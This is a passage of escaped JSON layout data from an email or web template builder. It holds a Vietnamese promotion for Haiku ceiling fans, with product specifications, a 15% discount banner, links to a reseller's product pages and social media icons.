15px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#ffffff\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_1\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\">NH\\u00c0 CUNG C\\u1ea4P \\u1ee6Y QUY\\u1ec0N CH\\u00cdNH H\\u00c3NG HAIKU - BIG ASS FANS T\\u1ea0I VI\\u1ec6T NAM<\\/p>\\\",\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_1\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"#236fa1\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_1\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"wnM4rRZ1up\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"WlezPt2_J3\\\",\\\"contents\\\":[{\\\"id\\\":\\\"56KZmfuYsA\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1678340400926-haiku_head.jpg\\\",\\\"width\\\":1200,\\\"height\\\":800},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_3\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"EMkB6Vrllj\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"25px 10px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#a47e6b\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_3\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-family: Cabin, sans-serif; line-height: 28px; font-size: 20px;\\\\\\\"><span style=\\\\\\\"line-height: 28px;\\\\\\\">\\\\\\\"Haiku L mang \\u0111\\u1ebfn s\\u1ef1 tho\\u1ea3i m\\u00e1i v\\u1edbi s\\u1ef1 ho\\u00e0n h\\u1ea3o s\\u1ef1 im l\\u1eb7ng v\\u00e0 m\\u1ed9t ki\\u1ec3u d\\u00e1ng \\u0111\\u1eb9p, thi\\u1ebft k\\u1ebf c\\u1ed5 \\u0111i\\u1ec3n.\\\\\\\"<\\/span><\\/span><\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"VbL1kpvFRg\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#292828\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_4\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"line-height: 140%; text-align: left;\\\\\\\"><span style=\\\\\\\"font-family: inherit; line-height: 19.6px;\\\\\\\">+ B\\u1ea3o h\\u00e0nh: 03 n\\u0103m; \\u0111i\\u1ec1u ki\\u1ec7n l\\u1eafp \\u0111\\u1eb7t trong nh\\u00e0 BH 05 n\\u0103m<\\/span><\\/p>\\\\n<p style=\\\\\\\"line-height: 140%; text-align: left;\\\\\\\"><span style=\\\\\\\"font-family: inherit; line-height: 19.6px;\\\\\\\">+ Di\\u1ec7n t\\u00edch l\\u00e0m m\\u00e1t: 52-inch: 15\\u2019 x 15\\u2019<\\/span><\\/p>\\\\n<p style=\\\\\\\"line-height: 140%; text-align: left;\\\\\\\"><span style=\\\\\\\"font-family: inherit; line-height: 19.6px;\\\\\\\">+ \\u0110i\\u1ec1u khi\\u1ec3n t\\u1eeb xa: \\u0111i k\\u00e8m, tu\\u1ef3 ch\\u1ecdn th\\u00eam \\u0111i\\u1ec1u khi\\u1ec3n g\\u1eafn t\\u01b0\\u1eddng<\\/span><\\/p>\\\\n<p style=\\\\\\\"line-height: 140%; text-align: left;\\\\\\\"><span style=\\\\\\\"font-family: inherit; line-height: 19.6px;\\\\\\\">+ T\\u1ed1c \\u0111\\u1ed9: 7 c\\u1ea5p<\\/span><\\/p>\\\\n<p style=\\\\\\\"line-height: 140%; text-align: left;\\\\\\\"><span style=\\\\\\\"font-family: inherit; line-height: 19.6px;\\\\\\\">+ B\\u1ed9 \\u0111\\u00e8n: tu\\u1ef3 ch\\u1ecdn th\\u00eam \\u0111\\u00e8n LED 16 dimmable<\\/span><\\/p>\\\\n<p style=\\\\\\\"line-height: 140%; text-align: left;\\\\\\\"><span style=\\\\\\\"font-family: inherit; line-height: 19.6px;\\\\\\\">+ M\\u00f3c treo qu\\u1ea1t: Universal, l\\u1eafp \\u0111\\u1eb7t tr\\u1ea7n nghi\\u00eang 33 \\u0111\\u1ed9<\\/span><\\/p>\\\\n<p style=\\\\\\\"line-height: 140%;\\\\\\\">* <span style=\\\\\\\"font-size: 8px; line-height: 11.2px;\\\\\\\">HAIKU L ch\\u01b0a bao g\\u1ed3m M\\u00f4-\\u0111un Wi-Fi \\u0111\\u1ec3 k\\u1ebft n\\u1ed1i \\u0111i\\u1ec1u khi\\u1ec3n APP (iOS\\/Android). H\\u00e3y li\\u00ean h\\u1ec7 b\\u00e1n h\\u00e0ng \\u0111\\u1ec3 t\\u01b0 v\\u1ea5n th\\u00eam<\\/span><\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"lEJLAP7i5b\\\",\\\"type\\\":\\\"menu\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"menu\\\":{\\\"items\\\":[{\\\"key\\\":\\\"1678340668824\\\",\\\"text\\\":\\\"Haiku Indoor\\\",\\\"link\\\":{\\\"name\\\":\\\"web\\\",\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"},\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-haiku-h\\\",\\\"target\\\":\\\"_self\\\"}}},{\\\"key\\\":\\\"1678340683893\\\",\\\"text\\\":\\\"Haiku Outdoor\\\",\\\"link\\\":{\\\"name\\\":\\\"web\\\",\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"},\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-ngoai-troi\\\",\\\"target\\\":\\\"_self\\\"}}},{\\\"key\\\":\\\"1678340694153\\\",\\\"text\\\":\\\"Haiku I series\\\",\\\"link\\\":{\\\"name\\\":\\\"web\\\",\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"},\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-haiku-i\\\",\\\"target\\\":\\\"_self\\\"}}},{\\\"key\\\":\\\"1678340708083\\\",\\\"text\\\":\\\"Haiku L Series\\\",\\\"link\\\":{\\\"name\\\":\\\"web\\\",\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"},\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-haiku-l\\\",\\\"target\\\":\\\"_self\\\"}}}]},\\\"fontFamily\\\":{\\\"label\\\":\\\"Lato\\\",\\\"value\\\":\\\"\'Lato\',sans-serif\\\",\\\"url\\\":\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Lato:400,700\\\",\\\"defaultFont\\\":true,\\\"weights\\\":[400,700]},\\\"fontSize\\\":\\\"14px\\\",\\\"textColor\\\":\\\"#444444\\\",\\\"linkColor\\\":\\\"#0068A5\\\",\\\"align\\\":\\\"center\\\",\\\"layout\\\":\\\"horizontal\\\",\\\"separator\\\":\\\"|\\\",\\\"padding\\\":\\\"5px 15px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_menu_1\\\",\\\"htmlClassNames\\\":\\\"u_content_menu\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"n7WfELuq5h\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"15px 10px 25px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-haiku\\\",\\\"target\\\":\\\"_blank\\\"},\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#a87f6b\\\",\\\"backgroundColor\\\":\\\"#ffffff\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"10px 20px\\\",\\\"border\\\":{\\\"borderTopColor\\\":\\\"#CCC\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopWidth\\\":\\\"1px\\\",\\\"borderLeftColor\\\":\\\"#CCC\\\",\\\"borderLeftStyle\\\":\\\"solid\\\",\\\"borderLeftWidth\\\":\\\"1px\\\",\\\"borderRightColor\\\":\\\"#CCC\\\",\\\"borderRightStyle\\\":\\\"solid\\\",\\\"borderRightWidth\\\":\\\"1px\\\",\\\"borderBottomColor\\\":\\\"#CCC\\\",\\\"borderBottomStyle\\\":\\\"solid\\\",\\\"borderBottomWidth\\\":\\\"1px\\\"},\\\"borderRadius\\\":\\\"1px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_3\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<strong><span style=\\\\\\\"line-height: 16.8px;\\\\\\\">T\\u00ccM HI\\u1ec2U TH\\u00caM<\\/span><\\/strong>\\\",\\\"hideMobile\\\":false,\\\"calculatedWidth\\\":145,\\\"calculatedHeight\\\":37}},{\\\"id\\\":\\\"-H-RpfJAgN\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1678340442333-mau-sau-haiku-L.jpg\\\",\\\"width\\\":1200,\\\"height\\\":800},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_4\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_5\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#ecf0f1\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1612262724776-H.png\\\",\\\"fullWidth\\\":false,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"width\\\":600,\\\"height\\\":224,\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_4\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"NcaesyMqCK\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"D15V5OdQMy\\\",\\\"contents\\\":[{\\\"id\\\":\\\"0qB6JF4LDN\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1681813445393-HaikuL_1000Res_Caramel_White.jpg\\\",\\\"width\\\":1000,\\\"height\\\":667},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_5\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"a9T_o4TtZN\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"25px 10px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#e03e2d\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_5\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-family: \'comic sans ms\', sans-serif; line-height: 19.6px;\\\\\\\"><span style=\\\\\\\"font-size: 34px; line-height: 47.6px;\\\\\\\"><strong>Sale Off 15%<\\/strong><\\/span><\\/span><\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"LJC_ksl8Gr\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 0px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Global Font\\\",\\\"value\\\":\\\"inherit\\\"},\\\"fontWeight\\\":400,\\\"fontSize\\\":\\\"20px\\\",\\\"color\\\":\\\"#34495e\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_6\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 24px; line-height: 28px;\\\\\\\">L\\u1ef0A CH\\u1eccN QU\\u1ea0T TR\\u1ea6N \\u0110\\u00daNG C\\u00c1CH<\\/span><\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"ch7zwTHuZu\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"48%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"2px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#34495e\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"5px 10px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_1\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"uhMkQt1D2G\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"160%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_7\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 160%;\\\\\\\">V\\u1edbi 03 \\u0111\\u01b0\\u1eddng k\\u00ednh c\\u00e1nh, 03 t\\u00f9y ch\\u1ecdn l\\u1eafp \\u0111\\u1eb7t v\\u00e0 nhi\\u1ec1u lo\\u1ea1i c\\u00f3 s\\u1eb5n<br \\/>gi\\u1ea3m chi\\u1ec1u d\\u00e0i, Haiku l\\u00e0 m\\u1ed9t gi\\u1ea3i ph\\u00e1p tho\\u1ea3i m\\u00e1i tao nh\\u00e3 cho h\\u1ea7u nh\\u01b0 b\\u1ea5t k\\u1ef3<br \\/>kh\\u00f4ng gian, t\\u1eeb c\\u0103n h\\u1ed9 studio \\u1ea5m c\\u00fang cho \\u0111\\u1ebfn m\\u00e1i hi\\u00ean ngo\\u00e0i tr\\u1eddi.<\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"2z6L5HzXUD\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"15px 10px 40px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/drive.google.com\\/file\\/d\\/1M827CJDInvngku46rJxTUGe2U_b5PTZp\\/view\\\",\\\"target\\\":\\\"_blank\\\"},\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#236fa1\\\",\\\"backgroundColor\\\":\\\"#ffffff\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"10px 20px\\\",\\\"border\\\":{\\\"borderTopColor\\\":\\\"#CCC\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopWidth\\\":\\\"1px\\\",\\\"borderLeftColor\\\":\\\"#CCC\\\",\\\"borderLeftStyle\\\":\\\"solid\\\",\\\"borderLeftWidth\\\":\\\"1px\\\",\\\"borderRightColor\\\":\\\"#CCC\\\",\\\"borderRightStyle\\\":\\\"solid\\\",\\\"borderRightWidth\\\":\\\"1px\\\",\\\"borderBottomColor\\\":\\\"#CCC\\\",\\\"borderBottomStyle\\\":\\\"solid\\\",\\\"borderBottomWidth\\\":\\\"1px\\\"},\\\"borderRadius\\\":\\\"1px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_1\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<strong><span style=\\\\\\\"line-height: 16.8px;\\\\\\\">XEM H\\u01af\\u1edaNG D\\u1eaaN L\\u1ef0A CH\\u1eccN S\\u1ea2I C\\u00c1NH PH\\u00d9 H\\u1ee2P ?<\\/span><\\/strong>\\\",\\\"hideMobile\\\":false,\\\"calculatedWidth\\\":393,\\\"calculatedHeight\\\":37}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_4\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#ffffff\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_3\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"gPbBQY2Q9v\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"w4JwDjRYXv\\\",\\\"contents\\\":[{\\\"id\\\":\\\"UqCJOkDb9C\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"30px 10px 0px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#a5726e\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_9\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 14px; line-height: 19.6px;\\\\\\\"><strong><span style=\\\\\\\"line-height: 19.6px; font-size: 14px;\\\\\\\">F O L L O W&nbsp; &nbsp;A L O N G&nbsp; &nbsp;W I T H&nbsp; &nbsp;U S<\\/span><\\/strong><\\/span><\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"rktmzZAX4g\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"28%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"2px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#ca979a\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_4\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"tIS5FWVh8R\\\",\\\"type\\\":\\\"social\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"icons\\\":{\\\"iconType\\\":\\\"rounded\\\",\\\"icons\\\":[{\\\"url\\\":\\\"https:\\/\\/pinterest.com\\/\\\",\\\"name\\\":\\\"Pinterest\\\"},{\\\"url\\\":\\\"https:\\/\\/youtube.com\\/\\\",\\\"name\\\":\\\"YouTube\\\"},{\\\"url\\\":\\\"https:\\/\\/instagram.com\\/\\\",\\\"name\\\":\\\"Instagram\\\"},{\\\"url\\\":\\\"https:\\/\\/soundcloud.com\\/\\\",\\\"name\\\":\\\"SoundCloud\\\"}],\\\"editor\\\":{\\\"data\\\":{\\\"showDefaultIcons\\\":true,\\\"showDefaultOptions\\\":true,\\\"customIcons\\\":[],\\\"customOptions\\\":[]}}},\\\"align\\\":\\\"center\\\",\\\"spacing\\\":14,\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_social_1\\\",\\\"htmlClassNames\\\":\\\"u_content_social\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"ozkROz9f_1\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\